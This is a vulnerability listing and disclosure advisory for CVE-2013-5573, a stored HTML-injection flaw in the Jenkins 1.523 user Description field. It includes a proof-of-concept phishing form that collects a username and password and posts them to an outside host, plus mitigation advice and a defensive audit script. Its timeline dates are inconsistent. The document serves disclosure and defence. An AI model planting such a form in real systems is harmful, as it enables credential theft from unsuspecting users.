CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Cross-site scripting (XSS) vulnerability in the default markup formatter in Jenkins 1.523 allows remote attackers to inject arbitrary web script or HTML via the Description field in the user configuration.
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Metrics
Metrics | Score | Severity | CVSS Vector | Source
V2 | 4.3 | | AV:N/AC:M/Au:N/C:N/I:P/A:N | nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date | EPSS V0 | EPSS V1 | EPSS V2 (> 2022-02-04) | EPSS V3 (> 2025-03-07) | EPSS V4 (> 2025-03-17)
2022-02-06 | – | – | 2.26% | – | –
2022-02-20 | – | – | 2.26% | – | –
2022-04-03 | – | – | 2.26% | – | –
2022-08-28 | – | – | 2.26% | – | –
2023-03-12 | – | – | – | 3.34% | –
2024-02-11 | – | – | – | 3.34% | –
2024-06-02 | – | – | – | 3.34% | –
2024-08-25 | – | – | – | 3.34% | –
2024-12-22 | – | – | – | 0.92% | –
2025-01-19 | – | – | – | 0.92% | –
2025-03-18 | – | – | – | – | 2.74%
2025-03-18 | – | – | – | – | 2.74%
EPSS Percentile
The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.
Publication date : 2013-12-17 23h00 +00:00
Author : Christian Catalano
EDB Verified : No
###################################################
01. ### Advisory Information ###
Title: Default markup formatter permits offsite-bound forms
Date published : 2013-12-16
Date of last update: 2013-12-16
Vendors contacted : Jenkins CI v 1.523
Discovered by: Christian Catalano
Severity: Low
02. ### Vulnerability Information ###
CVE reference: CVE-2013-5573
CVSS v2 Base Score: 4.7
CVSS v2 Vector : (AV:N/AC:L/Au:M/C:P/I:P/A:N)
Component/s : Jenkins CI v 1.523
Class : HTML Injection
03. ### Introduction ###
Jenkins CI is an extendable open source continuous integration server
http://jenkins-ci.org.
04. ### Vulnerability Description ###
The default installation and configuration of Jenkins CI is prone to a
security vulnerability. The Jenkins CI default markup formatter permits
offsite-bound forms. This vulnerability could be exploited by a remote
attacker (a malicious user) to inject malicious persistent HTML script
code (application side).
05. ### Technical Description / Proof of Concept Code ###
The vulnerability is located in the 'Description' input field of the
User Configuration function:
https://localhost:9444/jenkins/user/attacker/configure
To reproduce the vulnerability, the attacker (a malicious user) can add
the malicious HTML script code:
<form method="POST" action="http://www.mocksite.org/login/login.php.">
Username: <input type="text" name="username" size="15" /><br />
Password: <input type="password" name="passwort" size="15" /><br />
<div align="center">
<p><input type="submit" value="Login" /></p>
</div>
</form>
in the 'Description' input field and click on the save button.
The code execution happens when the victim (an unaware user) views the
'People List'
https://localhost:9444/jenkins/asynchPeople/
and clicks on the attacker user id.
06. ### Business Impact ###
Exploitation of the persistent web vulnerability requires a low
privilege web application user account.
Successful exploitation of the vulnerability results in persistent
phishing and persistent external redirects.
07. ### Systems Affected ###
This vulnerability was tested against:
Jenkins CI v1.523
Older versions are probably affected too, but they were not checked.
08. ### Vendor Information, Solutions and Workarounds ###
Currently, there are no known upgrades or patches to correct this
vulnerability. It is possible to temporarily mitigate the flaw by
implementing the following workaround:
'MyspacePolicy' permits
tag("form", "action", ONSITE_OR_OFFSITE_URL, "method");
Fix 'MyspacePolicy' by restricting the policy to ONSITE_URL only or
perhaps <form> could be banned entirely.
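Until the policy is restricted, an administrator can audit stored user descriptions for forms that post offsite. The following Python sketch is an added example, not code from the advisory or from Jenkins; it assumes the descriptions have already been exported into a dictionary keyed by user id, and it assumes "onsite" means a relative URL with no scheme and no host. The names is_onsite, FormActionFinder and audit_descriptions are hypothetical.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit


def is_onsite(url):
    """Assumed meaning of 'onsite': a relative URL with no scheme and no host."""
    # Browsers drop tab/CR/LF inside URLs and treat '\' like '/', so normalise first.
    cleaned = "".join(c for c in url if c not in "\t\r\n").strip().replace("\\", "/")
    parts = urlsplit(cleaned)
    return not parts.scheme and not parts.netloc


class FormActionFinder(HTMLParser):
    """Collects the action URL of every <form> whose target is not onsite."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.offsite_actions = []

    def handle_starttag(self, tag, attrs):
        if tag != "form":
            return
        action = dict(attrs).get("action") or ""  # empty action posts to the same page
        if not is_onsite(action):
            self.offsite_actions.append(action)


def audit_descriptions(descriptions):
    """Map user id -> list of offsite form actions found in that user's description."""
    findings = {}
    for user_id, markup in descriptions.items():
        finder = FormActionFinder()
        finder.feed(markup)
        finder.close()
        if finder.offsite_actions:
            findings[user_id] = finder.offsite_actions
    return findings


# Constructed sample data: the first entry reuses the form from the advisory.
SAMPLE_DESCRIPTIONS = {
    "attacker": '<form method="POST" action="http://www.mocksite.org/login/login.php.">'
                'Username: <input type="text" name="username" size="15" /></form>',
    "alice": '<form method="GET" action="/jenkins/search"><input name="q" /></form>',
    "bob": "Build engineer, <b>release team</b>.",
}

if __name__ == "__main__":
    for user, actions in audit_descriptions(SAMPLE_DESCRIPTIONS).items():
        print(f"{user}: form posts offsite to {actions}")
```

Protocol-relative (//host/...) and backslash-prefixed (/\host/...) actions are also reported as offsite, since browsers resolve both to another host.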
09. ### Credits ###
This vulnerability has been discovered by:
Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com
10. ### Vulnerability History ###
August 21st, 2013: Vulnerability identification
August 4th, 2013: Vendor notification [Jenkins CI]
November 19th, 2013: Vulnerability confirmation [Jenkins CI]
November 19th, 2013: Vendor Solution
December 16th, 2013: Vulnerability disclosure
11. ### Disclaimer ###
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of
this information.
###################################################